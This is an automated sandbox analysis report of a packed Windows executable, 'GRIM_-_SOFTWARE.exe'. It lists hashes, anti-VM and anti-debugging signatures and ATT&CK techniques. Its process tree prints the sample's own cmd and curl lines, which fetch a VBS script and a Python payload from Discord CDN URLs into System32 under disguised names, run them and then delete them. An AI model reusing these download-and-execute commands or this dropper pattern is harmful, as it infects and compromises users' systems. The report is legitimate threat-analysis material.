Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-03-2023 22:51

General

  • Target

    GRIM_-_SOFTWARE.exe

  • Size

    3.8MB

  • MD5

    6d7e1336a7185a2049c09429cc980b75

  • SHA1

    fd2de69db4416363fb6e34b42e0510256e0e28aa

  • SHA256

    01324ea7cc70df8163a950920606ec33375dd911b5297bf6d204939d19a1ffcb

  • SHA512

    88cf6bfc2deb543e0644100c7a3d547bd18a1e05715a4554d7c45a21a608bbf8821e0427630de9298197477dd5df2317c2c5c2aa01c1cbfe3a7b5531f91547e0

  • SSDEEP

    98304:s/dtvQLaLimy/whXcohnwA3wPiee6R8dqFedrh1NqYQ8wUkdqz54v8mY:gdt8my/ysoBDAPiURzenxuc4k1

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe
    "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:3804
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1083836125409447966/me.vbs --output C:/Windows/System32/prnmngrs.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3700
      • C:\Windows\system32\curl.exe
        curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1083836125409447966/me.vbs --output C:/Windows/System32/prnmngrs.vbs
        3⤵
        • Drops file in System32 directory
        PID:4064
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/882707027791605791/1089311596381220945/Fortnite_hack_toolv2.py --output C:/Windows/System32/IME/SHARED/IMESEARCHING.py >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\system32\curl.exe
        curl --silent https://cdn.discordapp.com/attachments/882707027791605791/1089311596381220945/Fortnite_hack_toolv2.py --output C:/Windows/System32/IME/SHARED/IMESEARCHING.py
        3⤵
        • Drops file in System32 directory
        PID:1572
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:/Windows/System32/prnmngrs.vbs C:/Windows/System32/IME/SHARED/IMESEARCHING.py
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2288
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\System32\prnmngrs.vbs" C:/Windows/System32/IME/SHARED/IMESEARCHING.py
        3⤵
        • Modifies registry class
        PID:3600
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
      PID:4732
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
      PID:4204
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
      PID:1856
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4636
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD5
        3⤵
        PID:3316
      • C:\Windows\system32\find.exe
        find /i /v "md5"
        3⤵
        PID:1060
      • C:\Windows\system32\find.exe
        find /i /v "certutil"
        3⤵
        PID:3988
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1079159361764602037/Welcome.mp3 --output C:/Windows/System32/Windows_FIEO.mp3 >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2584
      • C:\Windows\system32\curl.exe
        curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1079159361764602037/Welcome.mp3 --output C:/Windows/System32/Windows_FIEO.mp3
        3⤵
        • Drops file in System32 directory
        PID:3840
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Windows_FIEO.mp3
      2⤵
      PID:3760
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
      PID:396
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:/Windows/System32/prnmngrs.vbs
      2⤵
      PID:4508
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
      PID:1640
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:/Windows/System32/IME/SHARED/IMESEARCHING.py
      2⤵
      PID:5036
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
      PID:4680
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:404
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x474 0x4c4
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:5040

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    Virtualization/Sandbox Evasion (1) T1497
  • Discovery
    Query Registry (3) T1012
    Virtualization/Sandbox Evasion (1) T1497
    System Information Discovery (4) T1082

Downloads

  • C:\Windows\System32\IME\SHARED\IMESEARCHING.py
    Filesize 515KB
    MD5 7496905a1473f87362a0b838aaae1d60
    SHA1 e08a76acae2addf87faf4999ccce642dbf903c1a
    SHA256 a02ca0d375e96b5c2c65ff510ea4139cc064d9cef37a7e6e1077ba962ee0ea8c
    SHA512 8d18fb0e5cdbb138d97d315bd8cee9de03ec474c7d1cc426d502723edaf76b0abbd6ba2d0197255bbb13fc3834d0f62ae9f6b2b2a31176547992846f22e0bb70

  • C:\Windows\System32\Windows_FIEO.mp3
    Filesize 9KB
    MD5 7a3a54e10348afe1b57c512ad2466562
    SHA1 ec0c5a195c5b7383cb1cb2058f30f6c054f47c83
    SHA256 74c4c6de3ef3aa22b41bd4f4f7ca88da3424306ce04f110943628e3ff624c18b
    SHA512 e822769580d34bdcedb1b92f58a6838a35debed6a0fdd389c2dfc7b461a0f5761924ddcadf776d0240831d4735404455dc534fd43b64570dfe68b590b31e2f85

  • C:\Windows\System32\prnmngrs.vbs
    Filesize 74B
    MD5 3269bd7a1b211a3c0e4ee7fa6649105a
    SHA1 b96df5fd92329ce6f7f178aaae5852b921e0ff47
    SHA256 c4831319543698126520cb5bb4a438dbca70fc2fa899151dbec613d320a50896
    SHA512 41687e2c11c73185c0f398f6ed66466a8820d6c7b1a740ca3bbfb6cab4a059939db4f20d76d7a7fa3d943a55bd394bae61f2b72947b69995b041611245c787d4

  • memory/3804-145-0x00007FF687160000-0x00007FF687B57000-memory.dmp
    Filesize 10.0MB

  • memory/3804-137-0x00007FF687160000-0x00007FF687B57000-memory.dmp
    Filesize 10.0MB

  • memory/3804-136-0x00007FF687160000-0x00007FF687B57000-memory.dmp
    Filesize 10.0MB

  • memory/3804-135-0x00007FF687160000-0x00007FF687B57000-memory.dmp
    Filesize 10.0MB

  • memory/3804-143-0x00007FF687160000-0x00007FF687B57000-memory.dmp
    Filesize 10.0MB

  • memory/3804-133-0x00007FF687160000-0x00007FF687B57000-memory.dmp
    Filesize 10.0MB

  • memory/3804-134-0x00007FF687160000-0x00007FF687B57000-memory.dmp
    Filesize 10.0MB

  • memory/3804-147-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp
    Filesize 64KB

  • memory/3804-148-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp
    Filesize 64KB

  • memory/3804-149-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp
    Filesize 64KB

  • memory/3804-150-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp
    Filesize 64KB

  • memory/3804-151-0x00000181EE9D0000-0x00000181EE9D1000-memory.dmp
    Filesize 4KB

  • memory/3804-152-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp
    Filesize 64KB